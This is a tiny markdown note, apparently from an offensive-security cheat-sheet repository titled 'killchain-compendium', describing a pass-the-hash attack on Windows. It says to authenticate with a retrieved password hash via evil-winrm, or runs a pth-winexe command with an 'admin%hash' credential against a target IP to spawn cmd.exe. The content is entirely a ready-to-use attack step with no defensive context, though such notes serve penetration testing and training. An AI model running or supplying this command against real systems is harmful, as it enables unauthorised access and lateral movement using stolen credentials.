killchain-compendium/Exploits/Windows/Pass the Hash.md

130 B

Pass the Hash

  • Authenticate with retrieved hash
  • User evil-winrm or
pth-winexe -U 'admin%hash' //<target-IP> cmd.exe